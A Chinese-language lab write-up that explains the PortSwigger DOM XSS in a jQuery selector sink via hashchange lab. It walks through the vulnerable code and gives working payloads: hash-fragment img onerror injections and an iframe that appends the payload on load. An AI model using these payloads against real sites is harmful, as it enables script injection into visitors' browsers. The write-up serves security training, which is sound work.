【Portswigger : DOM XSS in jQuery selector sink using a hashchange event】

一句话解释这个漏洞:

攻击者把恶意代码放进URL的#后面,网站傻傻地把这段代码当成选择器的一部分执行,结果浏览器把这段"选择器"当成了HTML标签创建并执行了其中的JavaScript。

看看前端代码

$(window).on('hashchange', function(){
var post = $('section.blog-list h2:contains(' + decodeURIComponent(window.location.hash.slice(1)) + ')');
if (post) post.get(0).scrollIntoView();
});
关键部分解释
  1. 事件监听$(window).on('hashchange', function(){...})

    • 监听 window 对象的 hashchange 事件,当浏览器地址栏中 # 后面的哈希值发生变化时(比如从 #标题1 变成 #标题2),就会执行这个回调函数。
  2. 哈希值处理

    • window.location.hash:获取地址栏的哈希值(包含 #,比如 #Java入门)。

    • 控制台输入window.location.hash

      • .slice(1):去掉开头的 #,得到纯文本(比如 Java入门)。
    • decodeURIComponent():解码 URI 编码的字符(比如处理 %20 这类空格编码),避免中文 / 特殊字符匹配失败。

  3. 元素查找

    • $('section.blog-list h2:contains(...)'):在 <section class="blog-list"> 标签下,查找所有包含指定文本的 <h2> 标签(也就是博客标题)。
    • 注意::contains 是 jQuery 选择器,匹配包含指定文本的元素,匹配是大小写敏感的。
  4. 滚动到视图

    • post.get(0):把 jQuery 对象转换成原生 DOM 元素(因为 scrollIntoView() 是原生 JS 方法)。
    • scrollIntoView():让找到的元素自动滚动到浏览器可视区域的顶部(默认行为)。
    • 原代码中 if (post) 其实不够严谨,因为即使没找到元素,post 也是一个空的 jQuery 对象(布尔值为 true),应该改成 if (post.length > 0)

    https://0abd00710449d45fca56979b007600ea.web-security-academy.net/# <img src="x" onerror=alert(777)>

提示要用print打印机

bash 复制代码
https://0abd00710449d45fca56979b007600ea.web-security-academy.net/#%20%3Cimg%20src=%22x%22%20onerror=print()%3E

使用exploit server

iframe嵌入攻击:

iframe标签用于加载嵌入外部内容。

bash 复制代码
<iframe src="https://0acb007a0425916d804c03c000830035.web-security-academy.net/#" onload="this.src += '<img src=# onerror=print()>'"></iframe>

store(存储)并执行viewexpliot


相关推荐
狗凯之家源码网5 分钟前
电商代付系统从零搭建与实战指南
前端·后端·开源
小雨下雨的雨9 分钟前
通过鸿蒙PC Electron框架技术完成-井字棋游戏 - 实现详解
前端·javascript·游戏·华为·electron·鸿蒙
meilindehuzi_a10 分钟前
掌握 ES6 核心语法与大模型(NLP)项目工程化搭建指南
前端·自然语言处理·es6
IT_陈寒17 分钟前
Vue组件通信这个坑我跳了两次才知道怎么爬出来
前端·人工智能·后端
smallswan24 分钟前
第十四 算数运算
linux·服务器·前端
AI_零食25 分钟前
甄嬛人物日志-朗读升级 - 鸿蒙PC Electron框架完整技术实现指南
前端·学习·华为·electron·鸿蒙·鸿蒙系统
HackTwoHub25 分钟前
WEB扫描器Invicti-Professional-V26.50.0(自动化爬虫扫描)更新
前端·人工智能·chrome·爬虫·web安全·网络安全·自动化
copyer_xyf26 分钟前
Python 文件基本操作
前端·后端·python
x***r15137 分钟前
linux安装 redis-5.0.5.tar.gz 详细步骤(源码编译、配置、启动)
前端
程序员小羊!42 分钟前
01HTML预备知识
前端·html